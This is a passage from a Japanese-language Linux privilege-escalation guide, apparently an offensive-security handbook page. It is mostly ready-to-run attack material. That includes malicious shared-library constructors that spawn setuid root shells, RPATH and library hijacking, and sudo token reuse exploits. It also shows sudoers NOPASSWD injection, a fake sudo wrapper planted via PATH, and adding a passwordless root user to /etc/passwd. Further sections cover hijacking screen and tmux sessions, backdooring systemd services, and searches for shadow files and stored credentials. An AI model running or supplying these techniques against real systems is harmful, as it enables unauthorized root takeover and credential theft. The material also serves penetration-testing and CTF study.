例えば、“open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (そのようなファイルやディレクトリはありません)” のようなエラーに遭遇することは、悪用の可能性を示唆しています。

これを悪用するには、次のコードを含むCファイル、例えば "/path/to/.config/libcalc.c" を作成します:

#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject(){
system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

このコードは、コンパイルして実行すると、ファイルの権限を操作し、特権のあるシェルを実行することで特権を昇格させることを目的としています。

上記のCファイルを共有オブジェクト（.so）ファイルにコンパイルするには：

gcc -shared -o /path/to/.config/libcalc.so -fPIC /path/to/.config/libcalc.c

最終的に、影響を受けたSUIDバイナリを実行することで、エクスプロイトがトリガーされ、システムの侵害の可能性が生じます。

共有オブジェクトハイジャック

# Lets find a SUID using a non-standard library
ldd some_suid
something.so => /lib/x86_64-linux-gnu/something.so

# The SUID also loads libraries from a custom location where we can write
readelf -d payroll  | grep PATH
0x000000000000001d (RUNPATH)            Library runpath: [/development]

今、書き込み可能なフォルダーからライブラリを読み込むSUIDバイナリを見つけたので、そのフォルダーに必要な名前のライブラリを作成しましょう:

//gcc src.c -fPIC -shared -o /development/libshared.so
#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
setresuid(0,0,0);
system("/bin/bash -p");
}

エラーが発生した場合は、例えば

./suid_bin: symbol lookup error: ./suid_bin: undefined symbol: a_function_name

それは、生成したライブラリに a_function_name という関数が必要であることを意味します。

GTFOBins

GTFOBins は、攻撃者がローカルのセキュリティ制限を回避するために悪用できるUnixバイナリのキュレーションされたリストです。GTFOArgs は、コマンドに引数のみを注入できる場合の同様のリストです。

このプロジェクトは、制限されたシェルから抜け出し、特権を昇格または維持し、ファイルを転送し、バインドおよびリバースシェルを生成し、他のポストエクスプロイトタスクを容易にするために悪用できるUnixバイナリの正当な関数を収集します。

gdb -nx -ex '!sh' -ex quit sudo mysql -e '! /bin/sh' strace -o /dev/null /bin/sh sudo awk 'BEGIN {system("/bin/sh")}'

GTFOBins

GTFOArgs

FallOfSudo

sudo -l にアクセスできる場合、ツール FallOfSudo を使用して、任意のsudoルールを悪用する方法を見つけることができます。

Sudoトークンの再利用

sudoアクセスはあるがパスワードがない場合、sudoコマンドの実行を待ってからセッショントークンをハイジャックすることで特権を昇格させることができます。

特権を昇格させるための要件：

• ユーザー "sampleuser" としてシェルを持っている

• "sampleuser" が過去15分間に sudo を使用して何かを実行している（デフォルトでは、これはパスワードを入力せずに sudo を使用できるsudoトークンの期間です）

• cat /proc/sys/kernel/yama/ptrace_scope が 0 である

• gdb にアクセス可能である（アップロードできる必要があります）

（echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope で一時的に ptrace_scope を有効にするか、/etc/sysctl.d/10-ptrace.conf を永続的に修正して kernel.yama.ptrace_scope = 0 を設定できます）

これらの要件がすべて満たされている場合、次の方法で特権を昇格させることができます： https://github.com/nongiach/sudo_inject

• 最初のエクスプロイト (exploit.sh) は、/tmp にバイナリ activate_sudo_token を作成します。これを使用してセッション内でsudoトークンをアクティブにすることができます（自動的にルートシェルは取得できませんので、sudo su を実行してください）：

bash exploit.sh
/tmp/activate_sudo_token
sudo su

• 二番目のエクスプロイト (exploit_v2.sh) は、_ /tmp _ に setuid を持つ root 所有の sh シェルを作成します

bash exploit_v2.sh
/tmp/sh -p

• 第三のエクスプロイト (exploit_v3.sh) は sudoersファイルを作成し、sudoトークンを永続化し、すべてのユーザーがsudoを使用できるようにします

bash exploit_v3.sh
sudo su

/var/run/sudo/ts/<Username>

フォルダー内のファイルに書き込み権限がある場合、バイナリwrite_sudo_tokenを使用してユーザーとPIDのためのsudoトークンを作成できます。 例えば、ファイル_/var/run/sudo/ts/sampleuser_を上書きでき、PID 1234のそのユーザーとしてシェルを持っている場合、パスワードを知ることなくsudo権限を取得できます。

./write_sudo_token 1234 > /var/run/sudo/ts/sampleuser

/etc/sudoers, /etc/sudoers.d

ファイル /etc/sudoers と /etc/sudoers.d 内のファイルは、誰が sudo を使用できるか、そしてその方法を設定します。これらのファイルは デフォルトではユーザー root とグループ root のみが読み取ることができます。 もし このファイルを 読む ことができれば、興味深い情報を取得できる かもしれません。そして、もしあなたが 任意のファイルに書き込む ことができれば、特権を昇格させる ことができるでしょう。

ls -l /etc/sudoers /etc/sudoers.d/
ls -ld /etc/sudoers.d/

もし書き込みができれば、この権限を悪用することができます。

echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers.d/README

これらの権限を悪用する別の方法：

# makes it so every terminal can sudo
echo "Defaults !tty_tickets" > /etc/sudoers.d/win
# makes it so sudo never times out
echo "Defaults timestamp_timeout=-1" >> /etc/sudoers.d/win

DOAS

sudo バイナリの代替として、OpenBSD の doas などがあります。 /etc/doas.conf でその設定を確認することを忘れないでください。

permit nopass demo as root cmd vim

Sudo Hijacking

もしユーザーが通常マシンに接続し、sudoを使用して特権を昇格させることを知っていて、そのユーザーコンテキスト内でシェルを取得した場合、新しいsudo実行可能ファイルを作成して、あなたのコードをrootとして実行し、その後ユーザーのコマンドを実行させることができます。次に、ユーザーコンテキストの$PATHを変更します（例えば、.bash_profileに新しいパスを追加するなど）ので、ユーザーがsudoを実行すると、あなたのsudo実行可能ファイルが実行されます。

ユーザーが異なるシェル（bash以外）を使用している場合は、新しいパスを追加するために他のファイルを修正する必要があることに注意してください。例えば、sudo-piggybackは~/.bashrc、~/.zshrc、~/.bash_profileを修正します。別の例はbashdoor.pyで見つけることができます。

または、次のようなコマンドを実行します:

cat >/tmp/sudo <<EOF
#!/bin/bash
/usr/bin/sudo whoami > /tmp/privesc
/usr/bin/sudo "\$@"
EOF
chmod +x /tmp/sudo
echo ‘export PATH=/tmp:$PATH’ >> $HOME/.zshenv # or ".bashrc" or any other

# From the victim
zsh
echo $PATH
sudo ls

共有ライブラリ

ld.so

ファイル /etc/ld.so.conf は 読み込まれる設定ファイルの場所 を示します。通常、このファイルには次のパスが含まれています: include /etc/ld.so.conf.d/*.conf

これは、/etc/ld.so.conf.d/*.conf からの設定ファイルが読み込まれることを意味します。この設定ファイルは 他のフォルダを指し示し、そこに ライブラリ が 検索される ことになります。例えば、/etc/ld.so.conf.d/libc.conf の内容は /usr/local/lib です。 これは、システムが /usr/local/lib 内でライブラリを検索することを意味します。

何らかの理由で ユーザーが書き込み権限を持っている 場合、次のパスのいずれかに対して: /etc/ld.so.conf, /etc/ld.so.conf.d/, /etc/ld.so.conf.d/ 内の任意のファイル、または /etc/ld.so.conf.d/*.conf 内の設定ファイル内の任意のフォルダに対して、特権を昇格させることができるかもしれません。 次のページで この誤設定を悪用する方法 を見てください:

RPATH

level15@nebula:/home/flag15$ readelf -d flag15 | egrep "NEEDED|RPATH"
0x00000001 (NEEDED)                     Shared library: [libc.so.6]
0x0000000f (RPATH)                      Library rpath: [/var/tmp/flag15]

level15@nebula:/home/flag15$ ldd ./flag15
linux-gate.so.1 =>  (0x0068c000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000)
/lib/ld-linux.so.2 (0x005bb000)

/var/tmp/flag15/にlibをコピーすることで、RPATH変数で指定されたこの場所でプログラムによって使用されます。

level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/

level15@nebula:/home/flag15$ ldd ./flag15
linux-gate.so.1 =>  (0x005b0000)
libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000)
/lib/ld-linux.so.2 (0x00737000)

その後、/var/tmp に gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6 を使用して悪意のあるライブラリを作成します。

#include<stdlib.h>
#define SHELL "/bin/sh"

int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end))
{
char *file = SHELL;
char *argv[] = {SHELL,0};
setresuid(geteuid(),geteuid(), geteuid());
execve(file,argv,0);
}

Capabilities

Linux capabilitiesは、プロセスに利用可能なroot権限のサブセットを提供します。これにより、rootの権限がより小さく、独自の単位に分割されます。これらの単位は、プロセスに独立して付与できます。この方法で、権限の完全なセットが削減され、悪用のリスクが低下します。 capabilitiesとそれを悪用する方法について詳しく学ぶには、以下のページをお読みください:

Directory permissions

ディレクトリ内で、"execute"のビットは、影響を受けるユーザーがフォルダに"cd"できることを示します。 "read"ビットは、ユーザーがファイルをリストできることを示し、"write"ビットは、ユーザーが新しいファイルを削除および作成できることを示します。

ACLs

アクセス制御リスト（ACL）は、裁量的権限の二次的な層を表し、従来のugo/rwx権限を上書きすることができます。これらの権限は、所有者やグループの一部でない特定のユーザーに対して権利を付与または拒否することにより、ファイルやディレクトリへのアクセスをより制御します。このレベルの粒度は、より正確なアクセス管理を保証します。詳細はこちらで確認できます。

ユーザー"kali"にファイルに対する読み取りおよび書き込み権限を付与します:

setfacl -m u:kali:rw file.txt
#Set it in /etc/sudoers or /etc/sudoers.d/README (if the dir is included)

setfacl -b file.txt #Remove the ACL of the file

特定のACLを持つファイルをシステムから取得します:

getfacl -t -s -R -p /bin /etc /home /opt /root /sbin /usr /tmp 2>/dev/null

オープンシェルセッション

古いバージョンでは、他のユーザー（root）のいくつかのシェルセッションをハイジャックすることができます。 最新のバージョンでは、自分のユーザーのスクリーンセッションにのみ接続できるようになります。しかし、セッション内に興味深い情報が見つかるかもしれません。

スクリーンセッションのハイジャック

スクリーンセッションのリスト

screen -ls
screen -ls <username>/ # Show another user' screen sessions

セッションに接続する

screen -dr <session> #The -d is to detach whoever is attached to it
screen -dr 3350.foo #In the example of the image
screen -x [user]/[session id]

tmux セッションのハイジャック

これは古い tmux バージョンの問題でした。特権のないユーザーとして root によって作成された tmux (v2.1) セッションをハイジャックすることはできませんでした。

tmux セッションのリスト

tmux ls
ps aux | grep tmux #Search for tmux consoles not using default folder for sockets
tmux -S /tmp/dev_sess ls #List using that socket, you can start a tmux session in that socket with: tmux -S /tmp/dev_sess

セッションに接続する

tmux attach -t myname #If you write something in this session it will appears in the other opened one
tmux attach -d -t myname #First detach the session from the other console and then access it yourself

ls -la /tmp/dev_sess #Check who can access it
rw-rw---- 1 root devs 0 Sep  1 06:27 /tmp/dev_sess #In this case root and devs can
# If you are root or devs you can access it
tmux -S /tmp/dev_sess attach -t 0 #Attach using a non-default tmux socket

Check Valentine box from HTB for an example.

SSH

Debian OpenSSL Predictable PRNG - CVE-2008-0166

Debianベースのシステム（Ubuntu、Kubuntuなど）で2006年9月から2008年5月13日までに生成されたすべてのSSLおよびSSHキーは、このバグの影響を受ける可能性があります。 このバグは、これらのOSで新しいsshキーを作成する際に発生します。可能な変種は32,768種類のみでした。これは、すべての可能性を計算できることを意味し、ssh公開鍵を持っていれば、対応する秘密鍵を検索できます。計算された可能性はここで見つけることができます: https://github.com/g0tmi1k/debian-ssh

SSH Interesting configuration values

• PasswordAuthentication: パスワード認証が許可されているかどうかを指定します。デフォルトはnoです。

• PubkeyAuthentication: 公開鍵認証が許可されているかどうかを指定します。デフォルトはyesです。

• PermitEmptyPasswords: パスワード認証が許可されている場合、サーバーが空のパスワード文字列を持つアカウントへのログインを許可するかどうかを指定します。デフォルトはnoです。

PermitRootLogin

rootがsshを使用してログインできるかどうかを指定します。デフォルトはnoです。可能な値:

• yes: rootはパスワードと秘密鍵を使用してログインできます

• without-passwordまたはprohibit-password: rootは秘密鍵のみでログインできます

• forced-commands-only: rootは秘密鍵を使用してのみログインでき、コマンドオプションが指定されている必要があります

• no: いいえ

AuthorizedKeysFile

ユーザー認証に使用できる公開鍵を含むファイルを指定します。%hのようなトークンを含むことができ、これはホームディレクトリに置き換えられます。絶対パス（/で始まる）またはユーザーのホームからの相対パスを指定できます。例えば:

AuthorizedKeysFile    .ssh/authorized_keys access

その設定は、ユーザー "testusername" の private キーでログインしようとすると、ssh があなたのキーの公開鍵を /home/testusername/.ssh/authorized_keys と /home/testusername/access にあるものと比較することを示します。

ForwardAgent/AllowAgentForwarding

SSH エージェントフォワーディングを使用すると、サーバーに鍵を置かずに（パスフレーズなしで！）ローカルの SSH 鍵を使用することができます。これにより、ssh を介してホストにジャンプし、そこから 初期ホスト にある キー を使用して 別の ホストに ジャンプ することができます。

このオプションを $HOME/.ssh.config に次のように設定する必要があります：

Host example.com
ForwardAgent yes

注意してください、Hostが*の場合、ユーザーが異なるマシンにジャンプするたびに、そのホストはキーにアクセスできるようになります（これはセキュリティの問題です）。

ファイル/etc/ssh_configはこのオプションを上書きし、この設定を許可または拒否できます。 ファイル/etc/sshd_configはキーワードAllowAgentForwardingを使用してssh-agentフォワーディングを許可または拒否できます（デフォルトは許可です）。

フォワードエージェントが環境で設定されている場合は、次のページを読んでください。特権を昇格させるために悪用できるかもしれません：

興味深いファイル

プロファイルファイル

ファイル/etc/profileおよび/etc/profile.d/内のファイルは、ユーザーが新しいシェルを実行するときに実行されるスクリプトです。したがって、これらのいずれかを書き込むまたは変更することができれば、特権を昇格させることができます。

ls -l /etc/profile /etc/profile.d/

もし奇妙なプロファイルスクリプトが見つかった場合は、機密情報を確認する必要があります。

Passwd/Shadow ファイル

OSによっては、/etc/passwd と /etc/shadow ファイルが異なる名前を使用しているか、バックアップが存在する場合があります。したがって、すべてを見つけることをお勧めし、それらを読み取れるかどうかを確認して、ファイル内にハッシュがあるかどうかを確認してください：

#Passwd equivalent files
cat /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null
#Shadow equivalent files
cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db /etc/security/opasswd 2>/dev/null

時には、/etc/passwd（または同等の）ファイル内にパスワードハッシュを見つけることができます。

grep -v '^[^:]*:[x\*]' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null

Writable /etc/passwd

まず、次のコマンドのいずれかを使用してパスワードを生成します。

openssl passwd -1 -salt hacker hacker
mkpasswd -m SHA-512 hacker
python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'

次に、ユーザー hacker を追加し、生成されたパスワードを追加します。

hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash

E.g: hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash

あなたは今、hacker:hackerでsuコマンドを使用できます。

また、次の行を使用してパスワードなしのダミーユーザーを追加できます。 警告: 現在のマシンのセキュリティが低下する可能性があります。

echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
su - dummy

NOTE: BSDプラットフォームでは /etc/passwd は /etc/pwd.db および /etc/master.passwd にあり、また /etc/shadow は /etc/spwd.db に名前が変更されています。

あなたは いくつかの機密ファイルに書き込むことができるか 確認する必要があります。例えば、いくつかの サービス設定ファイル に書き込むことができますか？

find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | sort | uniq #Find files owned by the user or writable by anybody
for g in `groups`; do find \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME; done #Find files writable by any group of the user

例えば、マシンがtomcatサーバーを実行していて、/etc/systemd/内のTomcatサービス構成ファイルを変更できる場合、次の行を変更できます:

ExecStart=/path/to/backdoor
User=root
Group=root

あなたのバックドアは、次回tomcatが起動したときに実行されます。

フォルダの確認

以下のフォルダにはバックアップや興味深い情報が含まれている可能性があります: /tmp, /var/tmp, /var/backups, /var/mail, /var/spool/mail, /etc/exports, /root（最後のものはおそらく読み取れませんが、試してみてください）

ls -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/ /root

奇妙な場所/所有ファイル

#root owned files in /home folders
find /home -user root 2>/dev/null
#Files owned by other users in folders owned by me
for d in `find /var /etc /home /root /tmp /usr /opt /boot /sys -type d -user $(whoami) 2>/dev/null`; do find $d ! -user `whoami` -exec ls -l {} \; 2>/dev/null; done
#Files owned by root, readable by me but not world readable
find / -type f -user root ! -perm -o=r 2>/dev/null
#Files owned by me or world writable
find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null
#Writable files by each group I belong to
for g in `groups`;
do printf "  Group $g:\n";
find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null
done
done

最後の数分で変更されたファイル

find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" 2>/dev/null

Sqlite DB ファイル

find / -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' 2>/dev/null

*_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .git-credentials, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml ファイル

find / -type f \( -name "*_history" -o -name ".sudo_as_admin_successful" -o -name ".profile" -o -name "*bashrc" -o -name "httpd.conf" -o -name "*.plan" -o -name ".htpasswd" -o -name ".git-credentials" -o -name "*.rhosts" -o -name "hosts.equiv" -o -name "Dockerfile" -o -name "docker-compose.yml" \) 2>/dev/null

隠しファイル

find / -type f -iname ".*" -ls 2>/dev/null

PATH内のスクリプト/バイナリ

for d in `echo $PATH | tr ":" "\n"`; do find $d -name "*.sh" 2>/dev/null; done
for d in `echo $PATH | tr ":" "\n"`; do find $d -type f -executable 2>/dev/null; done